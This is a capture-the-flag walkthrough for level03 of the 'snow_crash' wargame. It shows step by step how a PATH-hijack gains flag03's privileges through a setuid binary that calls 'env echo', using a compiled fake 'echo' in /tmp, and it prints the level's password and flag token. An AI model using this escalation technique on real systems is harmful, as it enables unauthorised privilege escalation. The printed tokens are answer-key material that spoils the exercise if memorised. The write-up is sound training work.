Level03 - snow_crash

Connect with the previous password "kooda2puivaav1idi4f57q8iq"
	ssh -p 4242 level03@192.168.1.20 

You will see a "level03" file, that you can executed because the setuid control bit is active,
	
	ll -l
	-rwsr-sr-x 1 flag03  level03 8627 Mar  5  2016 level03*

When the setuid is active you have the same right of execution as the owner, so you are flag03.
But when you execute it, nothing really happend. 

So ltrace ./level03 it to see what inside

	__libc_start_main(0x80484a4, 1, 0xbffff7b4, 0x8048510, 0x8048580 <unfinished ...>
	getegid()                                                                                                                                                                = 2003
	geteuid()                                                                                                                                                                = 2003
	setresgid(2003, 2003, 2003, 0xb7e5ee55, 0xb7fed280)                                                                                                                      = 0
	setresuid(2003, 2003, 2003, 0xb7e5ee55, 0xb7fed280)                                                                                                                      = 0
	system("/usr/bin/env echo Exploit me"Exploit me
	 <unfinished ...>
	--- SIGCHLD (Child exited) ---
	<... system resumed> )                                                                                                                                                   = 0
	+++ exited (status 0) +++
	
We see that it use system to launch a echo whith "Exploit me", 

We going to create a binary with the name echo and make the program launch it. 
here the code of the program : 
	
	int main()
	{
		system("/bin/getflag");
		return (0);
	}

To create it go to tmp.

	cd /tmp
	vi echo.c 
	put code and save
	gcc echo.c -o echo
	cd ~
	export PATH="/tmp:$PATH"
	./level03 
	Check flag.Here is your token : qi0maab88jeaj46qoumi7maus

we got the flag with the help of this program.
